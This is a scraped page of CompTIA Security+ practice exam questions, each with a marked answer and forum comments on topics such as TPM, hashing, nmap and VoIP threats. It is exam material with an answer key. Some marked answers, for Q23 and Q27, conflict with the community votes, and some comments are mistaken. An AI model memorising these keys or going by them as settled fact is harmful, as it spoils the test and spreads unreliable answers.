change to the software circumvented technological protection measures. The analyst was tasked with determining the best method to ensure the
integrity of the systems remains intact and local and remote boot attestation can take place. Which of the following would provide the BEST
solution?

A. HIPS

B. FIM

C. TPM

D. DLP

Correct Answer: C

Community vote distribution


C (94%) 6%

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: C
In this question, an attack has already occurred so preventative measures such as HIPS, FIM, or DLP would not be helpful. Also, the analyst
wants to check the integrity of the system, and boot attestation can take place. TPM chips have mechanisms to prevent system tampering and
boot attestation can be done with TPM based hardware to verify the state of the firmware, bootloader, etc. TPM is the best option here.

=====================
Other Choices
HIPS (Host Intrustion Prevention System) - An installed software package which monitors a single host for suspicious activity by analyzing events
occurring within that host. This aims to stop malware by monitoring the behavior of code.

FIM (File Integrity Monitoring) - Technology that monitors and detects file changes that could be indicative of a cyberattack. FIM specifically
involves examining files to see if and when they change, how they change, who changed them, and what can be done to restore those files if
those modifications are unauthorized.

DLP (Data Loss Prevention) - A set of tools and processes used to ensure that sensitive data is not lost, misused, or accessed by unauthorized
users.
upvoted 20 times

  ELLEWOODS45 2 months, 3 weeks ago


I wish there was a way we could chat with each other, do y’all have a way you communicate ?
upvoted 6 times

  Ay_ma Highly Voted  5 months ago


The key sentence in the question is: "The analyst was tasked with determining the best method to ensure the integrity of the systems remains
intact and local and remote boot attestation can take place"

The attack already happened. 'HIPS' looks out for attacks. But in the situation of trying to restore, TPM seems like the best option.
upvoted 10 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


C. TPM which is the Trusted Platform Module, which helps prevent unauthorized changes to firmware or software
upvoted 1 times

  mlonz 2 weeks, 6 days ago


A trusted platform module is a hardware chip included on many laptops and mobile devicces. It provides full disk encryption
and supports a secure boot process and remote attestation. A TPM includes a unique RSA asymmetric key burned into the
chip that provides a hardware root of trust
upvoted 1 times

  nerdboy1992 1 month, 2 weeks ago


Though File Integrity Monitoring (FIM) detects any changes to software, it wouldn't be correct in this instance. This is due to the question stating
"remote boot attestation". Trusted Platform Module (TPM) provides this feature.
upvoted 1 times

  okay123 2 months, 3 weeks ago


Remote attestation: -Device provides an operational report to a verifcation server
- Encrypted and digitally signed with a TPM

So before a remote boot attestation can take place, TPM chips are needed
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 33/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  Check_mate 3 months ago


Selected Answer: B
It's clearly FIM it's a security Practice for ensuring integrity tPM is a trusted Platform Model for securing cryptoprocess
upvoted 2 times

  Sandon 1 week, 1 day ago


It's clearly not
upvoted 1 times

  Mondicles 4 months, 2 weeks ago


Selected Answer: C
The answer is C.
TPM protects the device against unauthorized firmware and software modification by hashing critical sections of firmware and software.
upvoted 2 times

  comeragh 5 months ago


Selected Answer: C
Sorry my earlier comment suggested HIPS. On further reading going with C - TPM
upvoted 2 times

  Ribeiro19 5 months ago


Selected Answer: C
check this out guys https://docs.microsoft.com/en-us/azure/security/fundamentals/measured-boot-host-attestation
upvoted 1 times

  varun0 5 months ago


Selected Answer: C
remote boot attestation only be done with something called measured boot which takes the hashes of the firmware, drivers, OS and stores them
in the TPM from where the admin can remotely ensure the integrity of the system and sure that it has not changed.
upvoted 4 times

  Wiggie 5 months ago


Selected Answer: C
Right answer
upvoted 2 times

  comeragh 5 months ago


Definitely not C (TPM). I agree with HIPS here being the correct answer.
upvoted 1 times

  inkedia3 5 months, 1 week ago


By definition HIPS is an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that
host. In other words a Host Intrusion Prevention System (HIPS) aims to stop malware by monitoring the behavior of code. This makes it possible
to help keep your system secure without depending on a specific threat to be added to a detection update.
Answer A is my choice
upvoted 4 times

  inkedia3 5 months, 1 week ago


The right answer is TPM. My initial choice is wrong Answer C.
upvoted 7 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 34/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #19 Topic 1

Which of the following is a reason to publish files' hashes?

A. To validate the integrity of the files

B. To verify if the software was digitally signed

C. To use the hash as a software activation key

D. To use the hash as a decryption passphrase

Correct Answer: A

Community vote distribution


A (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: A
A seems obvious to me.
upvoted 7 times

  securityexam101 Highly Voted  4 months, 4 weeks ago


Hashes = Integrity always
upvoted 5 times

  DALLASCOWBOYS Most Recent  6 days, 14 hours ago


A. Publishing hashes allows the comparison of hash values to verifiy integrity
upvoted 1 times

  GetBuckets 2 months ago


I believe it's 'B'. Software vendors publish the hashes of their software products so the end users (in case they downloaded the software from
3rd-party websites) can verify if the software has not been tampered with (added malware or malicious code). Digital signatures use hashes.
upvoted 1 times

  TinyTrexArmz 1 week, 1 day ago


But a hash does not prove that it was digitally signed. You take a plain txt file and, using a hash generator, create a hash for it. If I then share
the text file with you and you wanted to make sure what is currently in the text file is the same as what I sent you then you'd use a compatible
hash generator to generate a hash for the file you received. If our hashes match then the file wasn't changed. If the hash is different then
something happened in transit and you can't trust that txt file. To accomplish this I didn't have to digitally sign it or encrypt it or anything. Just
share the file with you along with my original hash.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
To validate the integrity of the files - Hash function algorithms compares the file's original and current hash values. And if a byte or even a piece
of the file's data has been changed, the original and current hash values will be different, and therefore you will know whether it's the same file or
not.
upvoted 2 times

  lordguck 3 months, 1 week ago


"A" is right obviously, but I have an question training dump from Okt/22 whicht says, "B" (rubbish if you ask me).
upvoted 1 times

  Ribeiro19 5 months ago


Selected Answer: A
To validate the integrity of the files
upvoted 2 times

  stoneface 5 months ago


Selected Answer: A
A - hashing
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A being correct answer here
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 35/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #20 Topic 1

A security manager has tasked the security operations center with locating all web servers that respond to an unsecure protocol. Which of the
following commands could an analyst run to find the requested servers?

A. nslookup 10.10.10.0

B. nmap -p 80 10.10.10.0/24

C. pathping 10.10.10.0 -p 80

D. ne -l -p 80

Correct Answer: B

Community vote distribution


B (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: B
nmap is looking for the unsecure port 80 (http), pathping only shows packet drops and latency.
upvoted 11 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: B
Answer: nmap -p 80 10.10.10.0/24 - Nmap or network mapper is a network discovery and security auditing tool mainly used to find services,
hosts, and open ports on a network. In this case, nmap will check for the HTTP port 80.
====================================
Other Choices
Nslookup - This command queries DNS servers to obtain DNS records
Pathping - This command provides information about network latency and packet loss at hops between a source and destination. Used for
troubleshooting network issues.
ne - Honestly not 100% here
upvoted 7 times

  TinyTrexArmz 1 week, 1 day ago


I agree the answer is nmap but I'll also say that the command would not find "all web servers" It would only find web servers on the
10.10.10.0/24 subnet.

Because of this fact and my not being familiar with that "ne" command, I chose it initially. Which I think is why it's there. To trick people like
me that get hung up on the word phrase "all web servers." As far as my search goes, I've not found a system that uses the "ne" command.
upvoted 1 times

  xxxdolorxxx Most Recent  2 weeks ago


Selected Answer: B
Nmap seems right to me. Done this a number of times when going for my eJPT.
upvoted 1 times

  comeragh 5 months ago


Selected Answer: B
B correct here
upvoted 4 times

  stoneface 5 months, 1 week ago


Selected Answer: B
b) nmap -p 80 10.10.10.0/24 ->
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 36/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #21 Topic 1

Which biometric error would allow an unauthorized user to access a system?

A. False acceptance

B. False entrance

C. False rejection

D. False denial

Correct Answer: A

Community vote distribution


A (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: A
FAR ( False Acceptance Rate ) ->

where an interloper is accepted (Type II error or false match rate [FMR]). FAR is measured as a percentage.
False rejection cause inconvenience to users, but false acceptance can lead to security breaches, and so is usually considered the most
important metric.
upvoted 14 times

  varun0 Highly Voted  5 months ago


Selected Answer: A
False Acceptance Rate - accepts wrong info
upvoted 5 times

  DALLASCOWBOYS Most Recent  6 days, 13 hours ago


A. False acceptance allows unauthorized user and accepts them as valid.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
False Acceptance - There are only two metrics that are used to determine the performance of biometrics: FAR (False Acceptance Rate) & FRR
(False Rejection Rate). False Acceptance Rate is a metric for biometric performance that determines the number of instances where unauthorized
persons were incorrectly authorized. For this question, a biometric error would mean that someone was authorized when they weren't supposed
to be authorized.
upvoted 4 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 37/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #22 Topic 1

A company is auditing the manner in which its European customers' personal information is handled. Which of the following should the company
consult?

A. GDPR

B. ISO

C. NIST

D. PCI DSS

Correct Answer: A

Community vote distribution


A (100%)

  comeragh Highly Voted  5 months ago


Selected Answer: A
GDPR correct here
upvoted 10 times

  secplusme 4 months, 1 week ago


GDPR is countries in the EU not all of Europe
upvoted 1 times

  varun0 Highly Voted  5 months ago


Selected Answer: A
GDPR - Privacy law for Europeans citizens
upvoted 6 times

  DALLASCOWBOYS Most Recent  6 days, 13 hours ago


A. GDPR is the General Data Protection Regulation implements security and privacy requirements for personal info of European residents
worldwide.
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Answer: GDPR - General Data Protection Regulation is a regulation in EU laws that requires businesses to protect the personal data and privacy
of EU citizens for transactions that occur within EU member states.
==============================
Other Choices:
ISO (International Organization for Standardization) - An independent, non-governmental organization that develops standards to ensure the
quality, safety and efficiency of products, services and systems.

NIST (National Institute of Standards and Technology) - A non-regulatory US government agency created to develop cybersecurity standards,
guidelines, best practices, and other resources to meet the needs of U.S. industry, federal agencies and the broader public.

PCI DSS (Payment Card Industry Data Security Standard) - A set of security standards for organizations that handle credit cards from major card
schemes.
upvoted 3 times

  grinop 3 months, 2 weeks ago


From what I see Global Data Protection Regulations is EU but not sure all of Europe
upvoted 1 times

  ExamTopicsDiscussor 4 months, 1 week ago


GDPR is for Europe.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 38/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #23 Topic 1

Which of the following are common VoIP-associated vulnerabilities? (Choose two.)

A. SPIM

B. Vishing

C. Hopping

D. Phishing

E. Credential harvesting

F. Tailgating

Correct Answer: AB

Community vote distribution


BE (64%) BC (17%) Other

  k9_462 Highly Voted  5 months ago


Selected Answer: BE
after heavy consideration and reading through multiple sec+ books, i m kinda going with B & D. vishing and credential harvesting as being the
most common attacks, as hopping doesnt ever seem to come up in the material.

https://fitsmallbusiness.com/voip-security-threats/
upvoted 20 times

  k9_462 5 months ago


although they dont specifically mention VOMIT, a common result of VOMIT would be credntial harvesting.

"VOMIT, is a VoIP hacking technique that extracts confidential data and voice packets directly from calls. VOMIT works by eavesdropping on
phone calls and converting phone conversations into files straight from your business phone system. This makes it easy to obtain company
information, including usernames, passwords, bank details, phone numbers, and call origin."
upvoted 7 times

  serginljr Highly Voted  5 months ago


Hopping does not exist in exam objectives
upvoted 15 times

  shi_ Most Recent  3 days, 8 hours ago


Selected Answer: BE
hopping doesn't exist in the exam options
for me i answered B and E
upvoted 1 times

  pwino 3 days, 21 hours ago


SPIM (Spam over Internet Telephony) is a type of spam that is sent over Voice over IP (VoIP) networks. It is a threat to VoIP systems just like email
spam is a threat to email systems. Vishing (Voice Phishing) is an attack where an attacker uses VoIP to impersonate a trusted entity and attempt
to steal sensitive information such as passwords, credit card numbers, or other personal information. Both of these attacks target the users of
VoIP systems and are common vulnerabilities associated with VoIP.

The correct answers are A. and B.


upvoted 2 times

  DALLASCOWBOYS 6 days, 13 hours ago


Band E. VoIP is Voice over Internet Protocol. Vishing is phishing over the phone. E credential harvesting is the process of gathering credentials
like usernames and passwords. Credential harvesting is often performed in phishing attacks, which is what Vishing is.
upvoted 1 times

  EricShon 1 week, 5 days ago


Selected Answer: AB
A. SPIM (Spam over Internet Telephony) and B. Vishing (Voice Phishing) are common VoIP-associated vulnerabilities.

SPIM is a form of spam that is delivered over VoIP networks. It is similar to email spam and can be used to deliver unwanted messages, such as
advertisements, phishing attempts, and malware.

Vishing is a type of social engineering attack that uses VoIP technology to make phone calls or leave voice messages with the goal of tricking
individuals into providing personal or financial information. This is done by spoofing the caller ID, making it appear as if the call is coming from a
legitimate source, such as a bank or government agency.
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 39/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  hsdj 1 week, 1 day ago


spim is spam over instant messaging
upvoted 1 times

  sarah2023 2 days, 22 hours ago


This is the correct definition according to CompTIA, however, examples of instant messaging platforms are Zoom, Skype, Messenger etc
which also support VoIP. This leads me to agree with EricShon that the correct answer is AB. Seems more of a straightforward logic to me
compared to agreeing with credential harvesting but please take it with a pinch of salt.
upvoted 1 times

  Sandon 1 week, 1 day ago


This is the correct answer
upvoted 1 times

  zf1343 6 days, 6 hours ago


Yes, SIP is the protocol for some SPIM solutions.
upvoted 1 times

  RvR109 2 weeks, 4 days ago


Selected Answer: BE
"Voice over Misconfigured Internet Telephones, of VOMIT as it’s so colorfully referred to, presents a serious security threat for VoIP phone
systems. Hackers use this method to eavesdrop and extract voice packets directly from ongoing calls, thus gaining access to sensitive
information such as call origin, usernames and passwords and financial data."
Vishing is obvious.

https://www.cloudtalk.io/blog/9-voip-security-vulnerabilities-and-how-to-fix-them/
upvoted 1 times

  tek7ila 2 months, 1 week ago


Selected Answer: BC
B - Vishing is obvious
C - Hopping - if its about vlan hopping than its that answer
upvoted 1 times

  Nirmalabhi 2 months, 1 week ago


Selected Answer: BE
I ll also go with B:Vishing and E:Credential harvesting. now Vishing is pretty obv but credential harvesting can be done by many ways. one of
which is social engineering and hence can attribute to Voip attack. the rest of the options do not indicate anything with voice service attack.
Hopping is not part of Sec+ objectives.
upvoted 2 times

  Kalender 2 months, 1 week ago


Selected Answer: AC
Hopping (vlan hopping) is related to voice and data, i.e. VoIP.

Vishing is already a VoIP related topic

but SPIM is more related to text messaging (smishing vs vishing)

that's why I say the answer is A and C


upvoted 1 times

  asum 2 months, 2 weeks ago


SPIM should be SPIT. Then answer is A and B
upvoted 4 times

  DALLASCOWBOYS 6 days, 13 hours ago


SPIM is a valid term. Spam over Internet Messaging. This is not a typo
upvoted 1 times

  fzorsqqmdmsvfqvqdv 1 month, 4 weeks ago


This.Agreed. C - hopping is not on the exam objectives.
Credential harvesting is too broad.

A / B - SPIT is the VoIP Equivalent of spam


upvoted 1 times

  Comicbookman 2 months, 3 weeks ago


B. Vishing Similar to e-mail phishing scams, another threat to keep an eye out for is vishing, or VoIP phishing. Much like its e-mail counterpart,
vishing lets hackers spoof caller ID and present a fraudulent phone identity. People who receive calls from a visher may be tricked into believing
they're talking to their bank or another legitimate institution, causing them to share sensitive information.VoIP Hopping
C. Next in line is VoIP hopping, which can enable remote eavesdropping, but more critically compromises VLANs, which were previously trusted
as providing a secure VoIP environment. VoIP hopping can enable a PC to mimic an IP phone, giving hackers the inroads to access the VoIP
system.
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 40/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

  whiteLightning0820 3 months, 1 week ago


Selected Answer: BE
I thought B and E
upvoted 3 times

  DoDaResearch 3 months, 1 week ago


Selected Answer: AB
Sticking with A and B as credential harvesting is an attempt to gain additional information after the initial attack vector has been exploited. With
the use of mobile devices over VoIP networks SPIM becomes an attack vector that can perform credential harvesting. The word common, weighs
heavily in my choices as both SPIM and Vishing are going to be more common than hopping or credential harvesting and both can be a doorway
to multiple attacks not mentioned. Always easier to get what you want just given to you. https://www.mimecast.com/blog/what-is-credential-
harvesting/ and https://www.avanan.com/blog/hello-this-is-credential-harvesting-calling I will test in the next 10 days and hope to pass.
upvoted 5 times

  be9z 3 months, 2 weeks ago


The Answer is B and E. Vishing is simple to understand. Credentials Harvesting is the second answer. It can be an email attack where hackers
have found a way to leverage voicemail to email notifications to send credential harvesting pages.
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


Selected Answer: DC
IP Phones and PCs are inline in most corporates, the hopping between vVLAN and dVLAN is very common VOIP attack.
upvoted 1 times

  [Removed] 3 months, 3 weeks ago


Selected Answer: BE
Hopping is a method of testing VoIP security
upvoted 2 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 41/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #24 Topic 1

Which of the following describes the exploitation of an interactive process to gain access to restricted areas?

A. Persistence

B. Buffer overflow

C. Privilege escalation

D. Pharming

Correct Answer: C

Community vote distribution


C (95%) 5%

  varun0 Highly Voted  5 months ago


Selected Answer: C
exploitation of interactive process is the commandline from where exploits can be run to gain root permissions in a system
upvoted 15 times

  DALLASCOWBOYS Most Recent  6 days, 13 hours ago


C. Privilege Escalation seeks to increase the level of access that a user normally doesn't have. A restricted access area is an increased level of
access.
upvoted 1 times

  xxxdolorxxx 2 weeks ago


Selected Answer: C
Priv esc.
upvoted 1 times

  NICKJONRIPPER 2 months, 2 weeks ago


Selected Answer: B
interactive means input, gain restrict area means modify memory that not allowed to the application, this is buffer overflow. No mention to gain
another account(privilege escalation).
upvoted 1 times

  Sandon 3 weeks ago


That ain't it
upvoted 3 times

  NICKJONRIPPER 2 months, 2 weeks ago


key is gain "area", not gain "account"
upvoted 1 times

  FMMIR 2 months, 2 weeks ago


Selected Answer: C
With Privilege Escalation, hackers can use a NON-INTERACTIVE program (application) to gain access. Privilege escalation happens when a
malicious user exploits a bug, design flaw, or configuration error in an APPLICATION (either a batch program or an interactive program) or
OPERATING SYSTEM utility program to gain elevated access to resources that should normally be unavailable to that user.
upvoted 1 times

  comeragh 4 months, 1 week ago


Selected Answer: C
Agree with C here being the correct answer
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 42/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #25 Topic 1

An organization is planning to open other data centers to sustain operations in the event of a natural disaster. Which of the following
considerations would BEST support the organization's resiliency?

A. Geographic dispersal

B. Generator power

C. Fire suppression

D. Facility automation

Correct Answer: A

Community vote distribution


A (100%)

  varun0 Highly Voted  5 months ago


Selected Answer: A
Placing that datacenter far away, maybe in another country can help protect against disasters like an earthquake
upvoted 10 times

  Gravoc Highly Voted  4 months, 3 weeks ago


At least 90 miles away for natural disaster industry standard guidelines.
upvoted 6 times

  DALLASCOWBOYS Most Recent  6 days, 13 hours ago


A. Geographic dispersal. Placing facilities in areas that are not going to be affected by the same disaster.
upvoted 1 times

  kasper13 2 months, 3 weeks ago


Selected Answer: A
Away from natural disasters and overheating
upvoted 1 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 43/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #26 Topic 1

A security engineer is deploying a new wireless network for a company. The company shares office space with multiple tenants. Which of the
following should the engineer configure on the wireless network to ensure that confidential data is not exposed to unauthorized users?

A. EAP

B. TLS

C. HTTPS

D. AES

Correct Answer: D

Community vote distribution


D (58%) A (42%)

  Gravoc Highly Voted  4 months, 3 weeks ago


EAP has to be incorrect. EAP is an AUTHENTICATION protocol, and authentication does not provide confidentiality. Authentication encompasses
processes that allows systems and networks to determine if a user is who they say they are. That provides integrity, not confidentiality.
Confidentiality ensures that secret information is protected from UNAUTHORIZED disclosure.

The question also ends with "unauthorized users".

HTTPS is just HTTP that uses TLS to encrypt network traffic that is in-transit.

A stated above, TLS encrypts in-transit data.

This question specifically states preventing exposed data to unauthorized users. TLS and HTTPS only encrypt in-transit data. Data-at-rest in a
network is insecure, though.

Only AES meets the criteria of providing confidentiality to both data-at-rest and data-in-transit, preventing unauthorized users from seeing either.
upvoted 44 times

  hieptran 3 weeks, 1 day ago


AES is not commonly used for data encryption in transit.
Also, the question mentioned, "prevent unauthorized access". AES is only cryptographic and does not provide any authorization to the
network... just keep it simple
upvoted 2 times

  Sir_Learnalot 2 months, 3 weeks ago


For me it is exactly the last phrase you reference here which make me think "A". You want to prevent confidential information from leaking to
"unautorized users", so you should make sure only authorized users have access to your Wireless network. Therefor you should use EAP. I
agree on AES beeing the ovious choise for confidentiality but from the wording of the question I´d go with EAP
upvoted 5 times

  adodoccletus 3 months, 3 weeks ago


You did a very good job with the explanation... kudos
upvoted 2 times

  Ay_ma Highly Voted  5 months, 1 week ago


EAP- Extensible Authentication Protocol (EAP), an authentication framework that provides general guidance for authentication methods. IEEE
802.1x servers typically use one of these methods to increase the level of security during the authentication process

TLS- Secure Sockets Layer (SSL) and Transport Layer Security (TLS) are encryption protocols that have been commonly used to encrypt data-in-
transit. For example, it is common to encrypt HTTPS with either SSL or TLS to ensure confidentiality of data transmitted over the Internet. They
can also be used to encrypt other transmissions such as File Transfer Protocol Secure (FTPS). However, TLS is now a replacement for SSL as
SSL is deprecated and shouldn't be used.

AES- Advanced Encryption Standard. A strong symmetric block cipher that encrypts data in 128-bit blocks. AES can use key sizes of 128 bits,
192 bits, or 256 bits.

HTTPS- Hypertext Transfer Protocol Secure. A protocol used to encrypt HTTP traffic. HTTPS encrypts traffic with TLS using TCP port 443.

Definitions are from Gibson Darril's Study. Guide


upvoted 19 times

  pwino 3 days, 21 hours ago


Most Recent 
EAP (Extensible Authentication Protocol) is the correct answer because it is a secure authentication protocol commonly used in wireless
networks. EAP provides a framework for multiple authentication methods and enables the use of stronger authentication mechanisms such as
smart cards, biometrics, and certificates. By using EAP, the security engineer can ensure that only authorized users can access the network and
that confidential data is protected. EAP also provides a secure mechanism for exchanging authentication information between the client and the
authentication server. This helps prevent unauthorized access and ensures that the data transmitted over the wireless network is protected.
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 44/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

upvoted 1 times
  I_Faisal 3 days, 21 hours ago
Selected Answer: A
Extensible Authentication Protocol (EAP)
A framework of protocols that allows for numerous methods of
authentication including passwords, digital certificates, and public key
upvoted 1 times

  ronniehaang 5 days, 2 hours ago


Selected Answer: A
A. EAP (Extensible Authentication Protocol) is commonly used in wireless networks to ensure secure authentication of users and devices, and
prevent unauthorized access to the network. By using EAP, the engineer can ensure that only authorized users and devices are able to access the
network and that confidential data is not exposed to unauthorized users.
upvoted 1 times

  DALLASCOWBOYS 6 days, 13 hours ago


D, AES. Advanced Encryption Standard is a widely supported encryption standard type for all wireless networks containing any confidential data.
EAP is an authentication protocol.
upvoted 1 times

  zf1343 1 week ago


Question is stressing on "exposing confidential data to unauthorized users". A simple wireless PSK authentication e.g., WPA2-Personal achieves
similar privacy protection as if you would implement 802.1x with complex EAP authentication protocols. Both will take advantage of AES.
Although the latter would take advantage of TLS too if EAP-TLS was implemented.
upvoted 2 times

  Zonas 1 week, 2 days ago


Make difference between confidential data and confidentiality. The engineer don't want to expose confidential data to unauthorised users, it
doesn't mean he wants to provide confidentiality of data.

He cannot implement AES directly on wireless network, he can choose WPA3 for example if he wants AES encryption.

So, a correct answer is EAP which can prevent unauthorised users to access confidential data on the network.
upvoted 1 times

  P0wned 2 weeks, 5 days ago


Selected Answer: A
Answer: A
A. EAP: Authenticates users and devices on the wireless network.
B. TLS: Encrypts data sent over networks.
C. HTTPS: encrypts data sent over the web
D. AES: encrypts data at rest or in transit.
upvoted 3 times

  shover 3 weeks, 1 day ago


Authentication just proves an Identity (EAP) Authorization grants access to data. Just because a user is authenticates doesnt mean they are
authorized. They want to data not to be accessed by unauthorized users either going out of the network or in their network. Encryption provided
by AES will prevent unauthorized users access to the data.
upvoted 2 times

  P0wned 1 month ago


Selected Answer: A
1st (A. EAP) is the correct answer.
upvoted 1 times

  mike47 1 month, 2 weeks ago


Selected Answer: D
What is AES wireless?
AES — The Advanced Encryption Standard (AES) encryption algorithm a widely supported encryption type for all wireless networks that contain
any confidential data. AES in Wi-Fi leverages 802.1X or PSKs to generate per station keys for all devices. AES provides a high level of security
like IP Security (IPsec) clients.
https://www.arubanetworks.com/techdocs/Instant_41_Mobile/Advanced/Content/UG_files/Authentication/UnderstandingEncryption.htm
upvoted 1 times

  jhfdkjshfkjdsho 1 month, 3 weeks ago


Selected Answer: D
D is the correct answer AES is a standard, not a security framework or protocol
upvoted 3 times

  jhfdkjshfkjdsho 1 month, 3 weeks ago


I mean A
upvoted 1 times

  jhfdkjshfkjdsho 1 month, 3 weeks ago

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 45/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

What is the difference between EAP-TLS and AES 256 encryption?

They are not just different protocols, they are entirely different concepts.

AES - the Advanced Encryption Standard - is a block cipher algorithm. In AES-256 the 256 denotes the key size (different key sizes also trigger
slightly different of AES). AES can be used for the transport encryption used within TLS; i.e. it can be the cipher that actually encrypts the
payload. AES is a subset of Rijndael standardized by NIST.

EAP describes a framework for authentication. The authentication mechanisms provided by EAP-TLS can be used within the handshake of TLS
to authenticate the client and/or server. Usually it is used to perform both client and server authentication though (compared to web browsers
that usually only perform server authentication).

So we aren't comparing apples and oranges here, we're comparing apples and asparagus.
upvoted 1 times

  Juraj22 2 months ago


Selected Answer: A
I think that want to access for users, not for devices and so on. Therefore i prefer EAP, besause EAP is authentication protocol for users, for
example with active directory or some radius. Like a network engineer, i prefer EAP. AES is strog, but in this context is much better EAP.
upvoted 1 times

  J_Ark1 2 months ago


Selected Answer: D
Advanced Encryption Standard AES protects Data in transit aka WIFI TLS translation layer secure protects data at rest, EAP smth smth protocol
is an auth mechcanism
upvoted 3 times

  tek7ila 2 months, 1 week ago


Selected Answer: A
"...ensure that confidential data is not exposed to unauthorized users" The last sentence makes me belive that A is the correct answer. EAP is
authentication protocol so it won't let unauthenticated users to see data.
upvoted 3 times

https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 46/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

Question #27 Topic 1

The Chief Compliance Officer from a bank has approved a background check policy for all new hires. Which of the following is the policy MOST
likely protecting against?

A. Preventing any current employees' siblings from working at the bank to prevent nepotism

B. Hiring an employee who has been convicted of theft to adhere to industry compliance

C. Filtering applicants who have added false information to resumes so they appear better qualified

D. Ensuring no new hires have worked at other banks that may be trying to steal customer information

Correct Answer: C

Community vote distribution


B (100%)

  inkedia3 Highly Voted  5 months, 1 week ago


It think the wording is a problem if you guys are considering B. Background checks is to identify falsification and misrepresentation. Answer is C
upvoted 14 times

  Renfri 2 months ago


You think the compliance officer wants to go through the trouble of doing a background check just so they can verify your experience? Lol
upvoted 2 times

  rhocale 1 month, 3 weeks ago


speaking from experience a background check does not verify anything on a resume.
upvoted 3 times

  andrizo 3 months, 3 weeks ago


A background check would not even verify anything on your resume.
upvoted 5 times

  fzorsqqmdmsvfqvqdv 1 month, 4 weeks ago


That's incorrect completely. Background checks do include employment history.
upvoted 1 times

  CyberU 4 months, 1 week ago


Compliance officer would be concerned about industry compliance and hence B seems relevant.
upvoted 4 times

  YusufMadkour Highly Voted  5 months, 1 week ago


Selected Answer: B
B

Source: https://www.pcicomplianceguide.org/what-does-the-pci-dss-say-about-employee-background-checks/

PCI DSS requires background checks for employees handling credit card holder data.
upvoted 13 times

  DALLASCOWBOYS 6 days, 12 hours ago


Most Recent 
B. In the banking industry, theft is a major concern. Being convicted of theft is an automatic red flag, and denial of employment.
upvoted 2 times

  Zonas 1 week, 2 days ago


Correct Answer is B
upvoted 2 times

  emma234 2 weeks, 5 days ago


background check dose not check your resume but it check your criminal records, drugs test, etc
I can be qualified for the job my resume can be true but working in a bank. but criminal history
upvoted 2 times

  Learner123_ 3 weeks ago


The answer is B
upvoted 2 times

  asum 3 weeks, 2 days ago


C. A background check determines that a person is who they say they are and are
not concealing criminal activity, bankruptcy, or connections that would make them
https://www.examtopics.com/exams/comptia/sy0-601/custom-view/ 47/539
2/4/23, 7:26 PM SY0-601 Exam – Free Actual Q&As, Page 1 | ExamTopics

unsuitable or risky. Employees working in high confidentiality environments or with


access to high value transactions will obviously need to be subjected to a greater
degree of scrutiny. For some jobs, especially federal jobs requiring a security clearance,
background checks are mandatory. Some background checks are performed internally,
whereas others are done by an external third party.
upvoted 1 times
  asum 3 weeks, 2 days ago
As COMPTIA guide says. A background check determines that a person is who they say they are and are
not concealing criminal activity, bankruptcy, or connections that would make them
unsuitable or risky. Employees working in high confidentiality environments or with
access to high value transactions will obviously need to be subjected to a greater
degree of scrutiny. For some jobs, especially federal jobs requiring a security clearance,
background checks are mandatory. Some background checks are performed internally,
whereas others are done by an external third party.
upvoted 2 times

  batuhanzeyad 4 weeks ago


Selected Answer: B
The right answer ist B of course
upvoted 1 times

  bengy78 2 months, 3 weeks ago


A background check does not mean only criminal, it can also be credit and other aspects. Per Comptia Certmaster "A background check
determines that a person is who they say they are and are not concealing criminal activity, bankruptcy, or connections that would make them
unsuitable or risky."
upvoted 4 times

  bengy78 2 months, 3 weeks ago


The answer is B. I've worked in the credit card industry under PCI DSS and the thing that got the most people fired or prevented from being hired
was poor credit scores and bankruptcy. Criminal background checks are a given, the banking industry is most concerned with how you handle
money.
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
